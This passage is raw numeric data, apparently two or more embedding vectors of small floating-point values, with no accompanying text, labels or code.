0.00044156873,-0.0011439547,-0.025518293,-0.013110712,0.0034329132,-0.0007718614,0.013828066,0.027120342,0.017501343,0.0067653856,-0.0049203066,0.011787726,0.005983281,-0.008857852,-0.009737272,-0.0065394132,0.006967305,0.011090569,0.004501701,-0.00229067,-0.0053724577,-0.0033687728,0.019501222,0.008547769,-0.0007905865,-0.01391918,-0.016228395,0.016658485,-0.0009257767,-0.009320937,-0.015609539,0.0070829205,-0.006838164,0.003128157,-0.041877165,0.015868459,0.014241369,0.004052456,0.004809351,0.010317824,-0.011871258,-0.0050651776,-0.022711353,-0.023568457,0.011488704,-0.013114168,-0.0021611715,0.02208525,0.020252312,-0.012029149,-0.007663303,0.0114684105,0.00050329545,-0.009341279,0.026555313,-0.01109971,-0.02081874,-0.0010332322,0.011596658,0.0025910034,0.046170514,0.000016923206,0.024686987,0.01173838,0.022942938,0.008688738,0.0063941856,-0.03272228,0.04420081,-0.024829425,-0.032416943,-0.0131817,-0.0065499134,0.0131734535,0.009072115,0.014209753,-0.00969214,0.007900663,-0.020250654,-0.013871528,-0.008397235,0.020885466,-0.00055451866,0.010705438,-0.02814025,-0.008700422,-0.0058695786,-0.026133562,-0.015502091,-0.027137889,0.011988425,0.0066729975,-0.018660523,-0.014260634,-0.0042380756,-0.00055920106,-0.02774278,-0.00644561,0.01358935,0.020565655,-0.01936256,0.013455571,-0.017626867,-0.024297386,-0.008397726,0.011671346,-0.001230087,0.0045582205,0.018982824,-0.008146134,0.004445469,0.003206982,0.005958909,-0.014388978,0.0051215575,-0.02073509,-0.014351087,0.025409665,0.006219688,-0.006642738,-0.034340963,-0.022433389,-0.002705686,-0.018198557,-0.017622605,-0.03420407,-0.010161135,-0.010208761,0.006997838,0.01288748,-0.0077858325,-0.0051239687,0.00012956018,0.004748379,0.021271532,0.0024262446,-0.0031959158,0.015184579,-0.016317934,-0.013245776,0.0012282617,-0.00690695,-0.0033571038,-0.031552438,-0.014158853,-0.021381672,0.00577938,-0.011653581,-0.0023981035,-0.0014734392,0.033167094,0.0050201984,-0.014470849,0.02239865,-0.036593474,-0.0036591948,0.012469709,0.007874378,0.028945323,0.029310144,-0.05552547,-0.0014911839,0.04025456,0.002985753,-0.013983491,0.011982116,-0.026374064,-0.06741001,-0.03366586,0.0352793,0.011601661,-0.0055035655,-0.033142425,0.032384884,-0.0020219837,-0.0033449724,-0.019291282,-0.0073469384,-0.0039314576,-0.0103093125,0.015395173,-0.0073785125,-0.00084244617,-0.00071296043,-0.0070103905,-0.013741207,0.0054921797,0.0051002605,0.0033674322,0.0151689425,0.017164323,0.024608454,-0.015128523,-0.0033597092,-0.010814147,0.007089449,-0.015651993,0.00063748035,-0.01590154,-0.01380049,-0.015474569,0.014408891,-0.022988418,0.0062002046,-0.002783877,-0.0127725955,0.020412683,0.00089520356,0.15303823,0.00840991,-0.008386003,-0.0099267475,-0.006578868,-0.0075129652,-0.027774021,0.017201986,-0.0010625167,0.02711248,-0.007482026,-0.011242878,0.024410848,0.008715192,0.0032942118,-0.012416351,-0.0010148988,0.13387084,0.0102908,0.028257553,0.019264575,0.0030014974,0.020259634,0.0063009756,0.0007876377,-0.029635854,-0.0032314477,-0.027836116,0.0067507857,0.0062433216,-0.010371935,0.01839639,-0.00072461314,0.0067861723,0.01163518,0.029320424,-0.01919595,-0.019939044,-0.015497512,-0.01338937,0.005247972,-0.020177064,-0.004917137,0.010567966,0.0069773355,0.013726912,0.003576934,0.0025433612,0.046308964,0.029946098,0.008743932,-0.011581502,0.013381744,-0.013987982,0.01822717,-0.022991607,0.0028543668,0.009215868,-0.02358412,0.013600045,0.0050535724,0.0010120965,-0.022086814,0.008897978,-0.009368939,-0.008531868,-0.011383316,-0.0063421093,-0.00681424,0.005864736,0.009168816,0.0058269505,-0.0261513,0.0019120758,0.00027073163,0.007413531,-0.012291659,-0.00825321,0.009851016,-0.0031065065,0.021930883,0.034588747,-0.024499217,0.013263834,0.0011638594,0.017616685,0.0049981168,0.00008409025,-0.0006053864,-0.0004187119,-0.016297765,0.0073372712,-0.012915673,-0.01328714,-0.00007368579,0.01986557,-0.009768013,0.01115981,0.00067668536,-0.032966733,-0.024841558,0.0034112276,0.005227746,0.026373412,-0.0036621816,-0.00042378425,-0.008843735,0.0023796814,-0.0074600712,0.0057688192,0.009021245,0.014920432,-0.009786301,0.010657742,-0.014016495,-0.020126475,0.014861802,0.022574961,-0.013686966,-0.00097410486,0.0020657775,-0.013896825,0.026041362,0.0037835839,-0.02366768,0.0033471792,0.009897106,-0.00079637324,-0.029052466,0.0052784444,0.0030516854,0.0011069638,0.014689796,0.00045271672,0.010777324,-0.017384566,0.004555784,-0.039209425,-0.01938139,-0.009024126,0.007878554,0.020920832,0.0061030607,0.018252783,0.0033732124,-0.010696411,0.010456216,-0.0049924795],[-0.0036068957,-0.0068387985,0.0010907069,-0.036935728,-0.0019178262,-0.038322408,0.010643523,0.011842189,-0.0023644567,0.009343406,0.0018967032,0.01182624,-0.0003527382,0.0013502981,-0.02320315,0.014427341,0.000107677355,-0.03133338,0.018155754,-0.012910522,0.010835409,-0.009756755,0.00008565291,-0.00527807,0.02604131,0.010133784,0.0050971294,0.006913543,-0.014011694,-0.015898697,-0.002493491,0.02670802,-0.005844373,-0.00082259625,0.0036203943,-0.009062434,0.022353366,-0.0029344182,0.017850578,-0.008790572,0.0085760895,-0.008028024,-0.020285623,0.03800636,-0.010118279,0.019609807,0.012592972,-0.010992303,-0.02038529,-0.009446047,0.026094578,0.007201109,-0.018252682,0.011088782,-0.0022103367,0.014154341,-0.006097331,0.0009451335,0.012179642,0.00053824595,-0.0028024944,0.01232193,-0.015848208,-0.011678007,0.009999187,-0.014109597,0.00021458781,0.0038566468,-0.012698737,-0.015753929,0.022741186,-0.0078369295,0.007746339,0.0068857674,-0.0067528835,0.00007256424,-0.0124310255,0.0035203472,-0.022359237,-0.022874609,-0.015618094,-0.013459282,0.014823334,-0.0024394619,0.01011658,0.0017738875,-0.016797982,0.021682877,0.0056579607,0.008465752,-0.021108547,-0.011339567,-0.00288699,0.012875351,-0.0074913953,0.032022674,0.023158241,-0.011050527,-0.003929439,0.001570363,-0.019266568,-0.0020547106,-0.024642175,0.006980029,0.014512429,-0.011920639,-0.02340819,0.015453351,0.0035636995,-0.0125422105,0.0028973785,0.0126706185,-0.0064417683,0.010263851,-0.0043993494,0.0006204951,0.020857569,0.012844283,0.008908156,0.0069902902,-0.012198564,-0.0077504315,0.01422879,0.004348998,-0.0075920904,-0.01961938,0.024982821,0.0056513874,0.0029718345,0.006655677,-0.0028313708,-0.0041670296,0.007167002,-0.011966198,0.009543889,-0.015602677,-0.012104411,0.009563676,0.0016763881,-0.025885556,0.0049186656,0.012780524,0.02941462,-0.0050954027,0.028790565,0.03499373,0.019047057,-0.0006773892,0.004071388,0.011740487,0.006341164,0.029700402,-0.00095109834,-0.0044738553,-0.00913845,0.007552608,0.0068168733,-0.008740351,-0.008009604,0.0006392684,0.011276906,-0.0058387397,-0.0026140679,0.0148686115,-0.006480194,0.02452016,-0.008536605,-0.020522226,0.009846836,-0.01067857,0.016177662,0.022247115,0.0026490916,0.009968604,-0.019592319,0.0057328297,0.0034172942,0.000389395,-0.005189186,-0.02234063,-0.005109713,0.025552878,0.00048687874,-0.0059663346,-0.010490415,0.0064212014,0.010316171,0.009045493,-0.011289399,0.012440567,0.0077831307,0.008633907,-0.006294788,0.021197097,-0.0019433871,-0.012731302,-0.028258499,0.16116647,-0.010487385,-0.009951306,-0.008517044,-0.006286931,-0.024513096,-0.01837142,-0.016785061,0.016039098,-0.025529481,0.008885389,0.0037393495,-0.007994176,-0.00018479794,-0.030629955,-0.00088383653,-0.0117045,0.027017904,-0.04351248,0.012014578,0.019815464,-0.0061921924,0.03459793,-0.0019126826,-0.0027451986,-0.0109202685,0.008951836,-0.022567246,-0.014832154,0.025941119,-0.0042302054,0.0065213675,-0.011357442,0.0049936064,0.004084729,-0.014082979,-0.0051865247,-0.0045527136,-0.00795386,0.011974048,0.0048318934,0.0013168007,-0.018028433,-0.030252632,-0.0040754164,0.011749767,0.0044696433,0.011295657,-0.013240134,-0.01612953,0.007922663,0.018339597,-0.0009893978,0.010191029,0.024307668,-0.008800632,0.014082422,-0.0064702127,-0.009976714,-0.008810602,-0.013155337,-0.011722469,-0.001149981,0.007457284,0.014528056,-0.017807238,0.0063549527,-0.0027674465,0.0154209295,0.012646552,-0.02493304,-0.009339006,-0.016232975,0.013100678,0.011493008,-0.0034153857,-0.012145853,0.01417636,-0.00072177005,-0.00633383,-0.0036173342,0.0039873403,0.0061208904,-0.003133967,-0.00029645886,0.004226854,-0.011971427,-0.005235221,0.011687989,0.01114805,0.005105412,0.02399875,0.00070898014,-0.020026319,0.021384971,0.0139363725,-0.0039704842,0.020979078,-0.0201618,-0.02073952,-0.0077159973,0.0025389288,0.000035138346,-0.0049858666,-0.015638832,0.013893826,-0.0017561641,0.0067731957,0.024432322,0.0013557536,0.045177273,0.0055260034,0.02008063,-0.016102785,0.00719009,-0.0033821505,0.020876013,0.017975625,0.0036712307,-0.024605691,-0.006799431,-0.0152644245,-0.012107327,0.007030867,0.01550548,-0.0013561063,-0.010546235,0.017817698,-0.007897921,0.024505034,0.006952883,0.018236108,0.023241498,0.007059087,0.009148864,0.018913804,0.015199964,-0.032150533,0.0063061444,0.0024355352,0.0110948915,-0.004303014,0.030995147,0.010358465,0.012051119,-0.0019390264,0.017610665,-0.005065715,0.017434787,0.021761172,0.008419144,0.012820622,0.013793901,-0.0039987075,0.004161959,-0.028687967,0.00993781,-0.015142914,0.008582997,-0.0037738595,-0.03525422,0.01576452,-0.012946224,-0.00046568477,0.0032384878,0.021848032,-0.019629128,0.09516222,0.008447901,-0.00962905,0.0005374424,-0.016975777,-0.016845949,0.02180913,0.011373789,0.0053770905,-0.0017766479,-0.025706148,-0.0070176194,-0.014741192,0.012693852,-0.004219173,0.014631533,-0.026019417,0.01801098,-0.011183616,-0.031719442,0.004903568,-0.006225021,-0.04856613,0.01440899,0.009028647,-0.000450321,-0.008515697,-0.017484857,-0.0025610959,-0.020015784,-0.013731806,-0.017088909,-0.0078905765,-0.010148241,-0.02038873,0.030720713,-0.0015646629,-0.0003713969,-0.010035514,0.016750542,-0.012139024,-0.00636716,-0.015860872,-0.015055433,-0.025402753,0.0295069,0.02827228,0.0013771272,0.008864766,0.020208638,-0.019003967,0.018242117,-0.004627128,0.018959112,-0.004386226,0.016366156,-0.013592022,-0.0030972795,0.0014523413,-0.02064027,0.020713046,0.023974508,-0.012465911,0.04432164,0.0047034663,0.007121763,-0.025672399,-0.007002332,-0.013400018,-0.0006344645,0.0013091168,0.013058659,0.008292239,-0.005929959,0.004106451,0.00029452544,0.0010255872,-0.0137276165,-0.0060498803,-0.005742321,0.007740932,0.031861503,-0.006885525,-0.00032565653,-0.004705804,-0.01880977,-0.019000262,0.013072921,0.0035034455,-0.00983676,0.034478974,0.01537145,0.008115893,-0.010362146,0.034343906,-0.03567029,0.0042042416,-0.0352168,-0.0368101,0.011321397,-0.0017494691,-0.007851597,-0.0048562023,0.01851848,0.022215404,0.02408281,0.0061897356,-0.0044697975,-0.0011456581,0.014401273,-0.013929401,0.0041776844,-0.031589232,0.0005119541,-0.0040244595,-0.011398502,0.020846,0.0035293133,0.013749338,-0.0008134241,0.027374066,0.0041399184,0.000057637637,0.005325064,-0.00063949404,0.007711086,-0.0086600315,0.016921101,0.0035444768,0.03955995,0.014645524,0.027407309,-0.022571724,-0.026278224,-0.01135693,0.009822525,0.018618895,-0.017942712,0.021438716,0.010230261,-0.014903107,0.0152195655,-0.022841409,0.0118251555,0.006300733,-0.0023189704,0.026617125,0.0018107473,0.015768038,-0.0029118273,0.006359859,-0.0041882945,-0.0076046595,-0.00083461095,-0.013227906,0.0022937988,-0.016754445,-0.009933864,-0.014250602,-0.004688529,0.041042052,-0.040024854,0.029043186,-0.021786856,-0.01946869,0.0081826905,0.0033686135,0.10276078,0.00086049834,-0.015157957,0.0037409589,0.0037564922,-0.0011294481,-0.00422103,0.023983672,-0.0026239823,0.0049669794,0.01716891,-0.016644558,-0.0011777115,0.0030424925,-0.007629067,-0.012343792,0.021395069,-0.023864679,-0.018203173,0.02703303,0.016066337,-0.0073272986,0.0011229323,-0.0035338101,-0.0031825076,-0.026515912,0.024756959,0.015814709,-0.0074065034,-0.023314096,-0.0025064864,-0.015285824,-0.0052426835,-0.014483914,-0.011165079,0.01185051,-0.014945494,-0.02644458,-0.029304488,0.0076358533,0.015995422,0.005008975,0.006339764,0.034866,-0.004876775,0.003518887,-0.020129655,0.045732893,0.020514423,-0.018016476,-0.019657783,0.032020565,-0.015108134,0.021126073,0.00058878167,0.0141781,-0.0056800116,0.013673568,0.0041532707,-0.013726759,0.013812667,0.0017474781,-0.029205076,-0.018246703,0.022562657,-0.0052627707,0.015278532,0.025636446,0.019635286,0.019459896,0.013771337,-0.012188448,0.0061287084,-0.010489473,0.015357791,0.008269738,-0.012120256,0.0025346489,0.03100597,0.0025473547,-0.027959045,-0.0054314826,-0.004837292,-0.008295006,-0.01324332,0.02362001,-0.01581299,0.02903396,-0.009210462,-0.0133637255,0.005587219,0.0000010703833,-0.005700636,-0.013910394,0.007446016,-0.0063604675,-0.045617297,0.0073815053,0.0032114843,0.0076398435,0.015828254,-0.017891303,-0.01804676,0.03147652,-0.017107274,-0.031057099,-0.023846688,-0.0011326657,0.009936545,0.007899264,0.015955845,-0.03535233,0.015201861,0.019480752,0.0032277142,-0.016560853,0.030749219,-0.026115797,0.01730676,-0.00082173425,0.0015159129,0.0037301132,-0.016444918,0.010233172,0.0046941694,0.019349355,0.017902927,0.0029016302,-0.04594673,0.015457299,-0.06290364,0.013619037,0.019657668,0.030502696,0.011923946,0.0047390284,0.010807782,-0.017630355,-0.009457589,-0.011484765,-0.0034730658,0.007162771,0.011123076,0.02600124,0.0142163215,-0.0002210424,-0.019404251,-0.0025170725,0.015840512,-0.0058892826,0.003795246,0.0077001182,-0.0045328536,0.004345911,-0.00878286,-0.009082756,0.025168208,-0.0023784707,-0.004899687,-0.02745659,0.04320871,-0.017133357,0.009866509,0.013986553,0.00040417057,-0.0073807775,-0.0016618025,-0.0210541,0.045337576,-0.011571434,0.0050924974,-0.0031324017,0.023286058,-0.035078887,0.004546479,0.00803478,0.004554513,0.01485603,-0.009583,-0.0136657385,0.026475875,-0.0057468005,0.030320495,0.031771064,0.011539518,0.02238816,0.012999526,0.0032907014,-0.01781102,0.0042375945,-0.0120753655,0.020796278,-0.03319928,0.00008093657,-0.00546492,0.017910091,0.009243585,-0.011475884,0.0007737732,0.010469464,-0.006548554,0.022542756,-0.010859161,-0.03236832,0.018497445,0.018977094,-0.010323775,0.02776968,-0.02723121,-0.0175708,0.017634947,0.004349523,0.007283352,-0.0046926304,-0.00837427,0.003883839,0.005039665,-0.019740565,-0.014888942,-0.014815125,0.009849273,-0.0021032367,0.013355179,0.006483785,0.0043084403,0.019527188,0.02477331,-0.0450375,0.012027694,-0.009707266,-0.027851885,-0.0026582852,0.0369457,0.016688358,-0.014507939,-0.0068968306,0.000029265353,0.0063354704,-0.02095423,0.0007305861,0.0060570017,0.036326326,-0.014349045,0.022833262,0.008985942,-0.00875172,-0.02028613,-0.018044956,-0.004672955,0.0086441105,0.009772112,-0.008935996,-0.021698277,0.010001207,-0.010054023,0.013463415,0.030174905,0.0021318553,0.0113230795,0.020918794,0.0033947178,0.010247063,0.021914132,-0.0068079513,0.002834126,-0.009361649,0.020378457,-0.018199211,0.028088449,-0.0015821113,-0.0071619027,-0.00028884772,0.0037882933,0.011839731,0.009747309,0.007687551,-0.002013166,-0.046646185,0.03087345,0.004223171,0.006791333,0.02185911,-0.000010256318,-0.018226987,-0.012086324,-0.011367434,-0.011602178,-0.033488635,-0.0035206855,-0.01618273,-0.0068985415,-0.00038736814,-0.021353405,0.00056837715,0.01330537,-0.020275205,0.008762806,0.0031225218,0.01659985,0.022237925,0.024459388,-0.0050116144,0.031526443,0.0138542075,-0.036915522,-0.030874874,0.011875532,-0.019754242,0.015563327,-0.0078102886,0.018602394,0.033725154,0.0017240478,-0.011106206,0.001070412,-0.0010215081,0.01732949,-0.0030201043,0.012700605,-0.0344956,-0.018280001,0.025856247,-0.004041957,0.0324794,0.032040317,0.013972199,0.0037846165,-0.008629159,0.0253173,-0.010290106,-0.0129803205,-0.025908368,-0.018823298,0.001482576,0.002625751,0.017322682,-0.019073779,0.013343294,-0.0057161422,0.007956067,0.020074122,-0.022566114,0.006505414,-0.019060107,-0.004750434,-0.01714885,-0.008334376,0.010953577,0.0036075725,-0.013779331,0.03690186,0.0021986437,-0.01063377,-0.018307507,-0.010044539,0.0065035825,-0.009814287,-0.0059213364,-0.016122269,-0.007266028,-0.012909462,0.03969624,-0.02496054,0.005265094,-0.0083196275,-0.002365964,0.017280387,-0.002839693,-0.009038318,0.0037516796,-0.04773155,0.020921882,-0.0032652104,-0.019464036,0.005912287,-0.00049131026,0.02222369,0.0008765438,-0.015058618,-0.0041910904,0.016369347,0.006445871,0.02309147,0.0016177088,0.029370833,-0.008679058,0.0025369378,-0.019820651,-0.017112058,0.015972894,-0.0087806685,0.020349016,-0.0067248647,0.014680532,-0.0071485336,0.00804259,-0.018358767,-0.012602864,0.03296895,0.0035547856,0.0011192275,-0.009405348,0.0038877414,0.0042559407,-0.009894302,-0.002947845,0.016526787,-0.03857799,0.017788695,0.016436378,-0.009876073,0.019766154,-0.03391133,0.01032389,-0.005087589,0.03866508,0.000596548,0.013501881,-0.009946681,-0.012168871,-0.011521265,-0.0020117068,-0.013785134,-0.013962547,-0.02055659,0.019916352,0.0121126855,-0.007019377,0.019283956,-0.015157583,0.0028950695,0.012119588,-0.0044330694,0.014807943,0.0017621374,-0.034806106,0.031211045,0.020331146,0.0069757495,-0.0015056476,-0.019858578,-0.009416185,-0.020832982,0.0056303875,-0.010313954,-0.0040811845,-0.0038895353,-0.00685778,0.010504908,0.009519745,0.043646246,-0.0073000793,0.010306479,-0.03323649,-0.015591066,-0.0086332075,-0.02815138,0.012987724,0.000665761,0.0039161225,-0.0065039406,0.0031724616,-0.009997985,-0.0180871,0.010044185,-0.0010722369,0.028519366,0.014069801,0.007939622,0.0029613539,0.012535728,-0.020678345,0.007062158,-0.012029883,-0.003095155,0.00008451233,-0.011259352,0.014230993,-0.0032487689,-0.015259956,0.013400598,-0.02020677,0.011612974,0.0036714755,0.005758618,-0.004177314,0.0115451645,0.0035846797,-0.018688088,0.0052465573,0.006327871,-0.016637558,0.007408208,-0.0051388904,0.015228675,0.011519717,-0.01427805,0.009795595,-0.00995401,-0.012420501,0.026702296,0.029376846,-0.0053213267,-0.01346878,0.003147274,0.0033294982,0.0036532055,0.012365066,-0.0064189145,-0.039958898,0.034712527,-0.011900436,0.00045840524,0.013382584,-0.01627768,0.0059656356,0.012989844,0.0054795826,-0.006690474,0.020456856,-0.025425151,-0.015866498,-0.0067680124,0.009327507,0.012786193,0.017091017,-0.011334487,-0.00948506,-0.019441055,-0.009425891,0.003706985,-0.008445014,0.0063880812,-0.0016714188,-0.0010257959,0.01197773,0.017939007,-0.010543422,-0.0011650006,-0.011347698,-0.009102735,-0.004838906,0.010678694,0.026545677,-0.009877118,-0.012240877,-0.0013558544,-0.025467683,-0.015038407,-0.01947148,0.00527372,-0.03407489,-0.016019423,0.004067509,0.013045868,0.0032579221,0.0021194327,-0.012082472,0.006089921,-0.008282678,-0.00340716,-0.009123249,0.013460978,0.01739581,-0.005923094,-0.0029762601,0.020478148,-0.0020434815,-0.0143734235,-0.0064642453,-0.004477369,-0.027010981,0.0014181593,0.007033183,0.016129985,-0.020244595,-0.003222873,0.0148177985,-0.00017497623,0.0025036626,0.019610323,0.010375781,-0.020846574,0.01706443,-0.009377784,-0.0221065,0.000018004073,0.0012055612,-0.0042284033,-0.012785711,0.011342462,-0.0012091156,-0.036340725,-0.0010510503,0.0047825975,-0.033679776,-0.01247558,-0.0022165962,0.017225424,-0.008667932,0.019594915,0.00054746185,0.009739293,-0.0064760884,0.014532884,-0.01122939,0.015772656,-0.0027724146,0.031266376,0.008114672,-0.01780951,-0.033733103,-0.013843431,0.026589876,-0.0031687596,0.018429741,-0.033982076,-0.023382612,0.007824935,0.001348085,0.029838126,-0.0018386549,-0.014179968,-0.019040832,0.002141514,-0.009332758,-0.0032961753,0.0003085621,-0.01384904,-0.005805715,0.0008628608,0.029145788,-0.012758444,0.0064748633,0.008197238,-0.0025876341,0.009137776,0.0058839587,-0.017261611,0.016625814,-0.0032850774,-0.0026634242,0.0017125169,-0.021310035,0.006637162,-0.008655021,-0.004744512,-0.0106975315,-0.01518624,-0.023380226,0.010988673,0.025605112,0.041426606,0.028002933,-0.014001237,0.0016360935,0.016110998,0.018982967,-0.011018067,-0.0074102622,0.020548308,-0.017737187,0.017986603,0.0013529849,-0.017261961,0.015822884,-0.022371717,0.008848712,0.0015350097,0.00055116665,-0.0021662374,0.020267708,0.005443607,0.014259897,0.013559316,0.01745853,0.0034530582,0.0052172267,0.01296016,0.0058199014,-0.0025901466,-0.007582178,-0.0006521617,-0.008815396,0.0058671483,0.036578417,-0.0020952076,-0.0017213301,0.002314076,-0.0010844421,-0.017413048,0.009221593,0.022201788,-0.005513854,-0.016526533,0.021618828,-0.008733482,-0.007058508,0.00924373,0.0016833993,0.002674276,-0.016949452,0.00027436865,0.019247157,-0.0034494745,0.013045856,-0.008091923,0.023560984,-0.01628715,-0.020700498,0.010211013,-0.022676468,-0.005441009,-0.0011136946,0.0038717093,0.018622993,0.0063565066,0.012126579,-0.026479334,0.0018644573,-0.0287169,0.010047585,0.0020936741,0.013438651,0.005768871,-0.010413442,-0.0020367396,-0.008804707,-0.007752037,0.0047156084,-0.0121639585,-0.011756053,0.028378783,0.026663344,0.026334787,-0.0025364046,0.006780098,-0.013806022,-0.021233376,0.0018005249,-0.010936948,0.0114512965,0.03292996,-0.0010881154,-0.023167435,0.009095754,-0.012137605,0.0016507759,-0.023897227,0.08151152,-0.009336808,-0.005079511,-0.02163062,-0.0034226375,-0.0012103094,-0.01863439,0.0030508921,0.017949203,0.028435197,-0.014129908,-0.0018769522,0.014550281,0.0026094425,-0.012217992,-0.010052078,-0.02211055,0.010602572,0.014017215,-0.015651872,-0.027734498,0.002797899,-0.009833863,-0.0019517965,-0.02231018,-0.021011092,0.033048384,-0.0013133724,0.0019810754,0.026592612,-0.0057251323,0.0019213498,0.005491981,0.012325289,0.033092666,-0.008064787,-0.014075694,0.0227676,-0.027064689,0.00013385224,0.026546756,0.002435091,0.00004720935,-0.013668759,0.0042639324,0.022681769,0.09947518,0.0046420004,-0.0014507052,-0.027492395,0.009526297,0.028594678,0.003107812,0.01603371,0.012625075,-0.031893585,0.0186016,0.019192107,0.009865206,-0.009300434,0.00038518317,-0.02804102,-0.0034217997,0.009403615,-0.00021180458,-0.031748787,-0.029941097,0.009970281,-0.009425679,-0.019375466,0.015050613,0.015662538,0.010820377,0.0067907604,0.0007701521,-0.010267472,-0.0048060697,-0.0049567767,0.0017274922,0.020899931,0.00026554722,-0.06865123,-0.0024410842,0.21420075,-0.00010130681,0.025617808,0.012946532,0.002836935,-0.004577986,-0.07805486,-0.01565244,-0.00088426913,0.013283676,-0.02401006,-0.008487833,0.0019411028,-0.0024559272,0.008534373,0.013812967,-0.0032522643,-0.024572697,0.0015104084,-0.015788246,-0.0035398456,-0.0067496253,-0.020142335,0.018081909,-0.012477851,0.017231861,0.019415187,-0.012148787,-0.011979709,0.029071838,-0.00033348054,0.008932937,-0.0014094863,-0.019547502,-0.0038231558,0.0014934819,0.005120463,-0.002193307,-0.001475822,-0.023279587,0.012545444,-0.024473885,-0.010506468,-0.0021060852,-0.1373197,0.00011916487,-0.022597339,-0.043023486,0.018586537,-0.004960024,0.015150972,-0.016606651,0.0038118027,0.002639578,-0.00989303,-0.021066692,0.01573116,-0.012220863,0.002888384,0.0012708073,0.010072335,0.011472728,0.006496027,0.010866448,0.000076979246,-0.011268012,-0.006842346,0.0062859296,-0.0068498645,0.009370443,-0.021602795,0.0068260566,0.0044809654,-0.0034147887,-0.0028371464,-0.0026237075,-0.008104665,-0.018988013,-0.009847257,-0.0012605271,-0.01764909,0.017646493,0.009740324,-0.016114652,-0.0067477394,-0.012994578,0.0026326678,0.008825132,-0.009670463,0.012815717,0.020147076,0.0056946073,0.00990138,0.008647724,0.02395034,0.021015372,-0.011737283,-0.0025842683,0.0105987815,-0.010932294,-0.011334031,0.010672982,0.002398941,0.0043028793,-0.0037203555,-0.01629311,-0.021108938,-0.014851161,0.013865213,-0.028375316,0.013938446,-0.025381345,0.0065471623,-0.009504982,0.010157114,-0.010056525,0.02021559,-0.019973442,0.029831551,0.0008320756,-0.0012370792,0.017039265,0.011219456,0.014752823,-0.0012691675,-0.00949264,-0.004874366,-0.0007206903,-0.023440953,0.0027362322,0.009373131,-0.008114321,-0.0061218496,-0.01175768,-0.014019409,0.023354255,0.021608802,-0.0059234938,-0.010630335,0.018015472,0.002880156,-0.0071107103,0.007782856,0.0030217876,-0.006403008,0.024083171,-0.017743012,0.023918893,-0.022514377,0.0027650904,-0.01536176,-0.0143210385,-0.015166503,-0.01294113,0.01672782,0.0029909369,0.0034725848,0.0020251193,-0.024753468,-0.015680978,0.027265426,0.007452235,0.010775903,-0.010945397,-0.025751924,-0.021969957,-0.0017184216,0.005079954,0.013357876,-0.009637839,0.0011179473,-0.0035437378,-0.0138739,0.01220698,0.009923732,0.005666708,-0.011379159,0.007963504,-0.016195334,-0.018718975,-0.0066320193,-0.031793956,-0.0025269014,0.02118066,-0.0016613288,-0.028561538,-0.015551642,-0.016030401,-0.019302495,0.010642825,0.023171889,0.0036654435,0.00438489,-0.0020824154,-0.0063305157,0.015852869,0.017648594,-0.022101762,-0.019394517,0.10853199,-0.008645074,-0.002182439,0.00063173467,-0.013049357,0.0076855267,0.03733372,0.00092637556,-0.0044228267,-0.005760375,-0.049678456,-0.00021546902,-0.013933437,0.038599595,-0.024388323,0.03024899,-0.0015965858,-0.0043613054,0.020553151,0.005252958,0.0011745751,-0.044921294,-0.0039409488,0.01767478,0.0022722688,-0.002816064,0.0026529708,-0.020752534,-0.021148778,-0.007819747,-0.018282043,0.0060627637,0.008048921,-0.00040916135,0.029499711,-0.03446916,0.0031842925,0.009694072,-0.0033297671,0.0189969,0.008332637,0.01512406,0.0045077903,-0.015922101,0.0110448515,0.0030651123,-0.0035910676,0.016491406,-0.0068629696,-0.002718806,0.0114561785,0.009240663,0.0027781357,-0.022870483,-0.00015336822,-0.032298185,0.0047992095,-0.00017540272,0.0006800736,0.0037849138,0.040701862,-0.017131679,-0.0008227228,-0.018560074,-0.024762662,0.012345741,0.006823505,0.021800943,0.006902768,0.02436362,0.0026739899,-0.010973415,0.011300151,-0.013971682,-0.01181611,0.0067585497,-0.03564876,-0.0074451775,-0.015950646,-0.003099347,0.020325553,-0.0062368806,0.029367983,0.017500522,-0.009586466,-0.042756025,0.004668195,-0.019117689,-0.032260485,0.006405178,-0.005979505,0.019362498,-0.019185582,0.0103273615,0.0008820225,-0.029822566,-0.028418541,0.007664604,-0.0057778605,0.007828793,-0.0154094715,0.002268171,0.0070865676,-0.029665317,-0.016506044,-0.029932326,0.01272803,-0.010001443,0.0031702076,-0.021882532,0.034223896,0.007826265,0.033576917,0.015700733,0.016856736,0.043068152,-0.004096633,-0.00029000628,-0.012082027,-0.030013425,-0.00012419891,-0.027049562,0.014321501,-0.01656106,0.019355517,-0.0019665065,-0.00701384,0.016050827,-0.017363954,-0.026525702,-0.017070241,0.023464216,-0.023196453,-0.00014425759,-0.016877592,-0.015805453,0.034022547,-0.0017987243,0.007478758,0.026304228,-0.017924413,0.0038934515,-0.017289292,-0.01889898,0.008458701,0.012768146,0.0029086014,0.015042506,-0.00046304308,0.008976907,0.0038490135,0.0065187383,-0.0045179725,-0.0022153144,0.0022056114,0.028005973,-0.011955601,0.019332258,0.0006479311,-0.019867383,0.005141755,0.036472127,-0.029528413,-0.019424979,-0.0066740327,0.029809678,0.022017641,-0.0073533454,0.03032424,0.0027881023,-0.029813465,-0.006878742,-0.019141091,0.014694289,0.009401958,0.015537096,-0.009689316,-0.0030229934,-0.014753975,0.008152234,0.018426903,0.023448229,-0.016926477,-0.003721842,-0.00654687,0.00870786,0.010386125,0.0071357763,-0.011802638,-0.012945974,-0.0040787123,0.00031616414,-0.0321865,-0.0063029276,0.01098586,0.03388645,-0.0059289113,0.012297912,0.004402047,0.00033483538,-0.009571292,0.005835074,-0.018647494,-0.0053330064,0.0081919925,-0.010953082,-0.00059143343,-0.012107234,-0.016824348,0.0024715627,0.013164101,0.008578822,-0.003545263,-0.0006688529,0.00449573,-0.0083288625,-0.010202311,0.020003,0.00033205465,0.012191309,0.01255279,0.00052693096,-0.010477411,-0.015423045,-0.031797282,-0.007537132,0.0015117521,0.08863122,-0.015549856,-0.0023136465,0.0014421035,0.03717961,0.022698965,0.0026154474,0.008034881,-0.014206146,-0.019021306,-0.013264636,-0.009593703,0.007476932,-0.00005645758,-0.018938202,-0.0034761676,-0.0031684365,0.02243309,-0.026165154,-0.013406365,0.007530534,0.005126133,-0.0028822129,-0.008148021,0.0077419914,-0.05437108,-0.00062598457,0.0022921658,-0.016873404,0.01892904,0.003984651,0.0018532934,0.003977063,-0.008285182,-0.003335674,0.031944573,0.032548133,-0.014480802,-0.028011588,0.025276916,0.0025124538,0.0020133283,-0.00079061557,0.010570117,-0.030999366,0.037507586,0.01259564,-0.0049285223,0.0033723386,0.016596317,-0.040944643,0.036573496,-0.023531476,-0.0112279365,0.02237299,0.01023358,-0.005564611,-0.015164717,0.010409035,0.025883066,-0.0022070569,-0.009098498,-0.0024223153,0.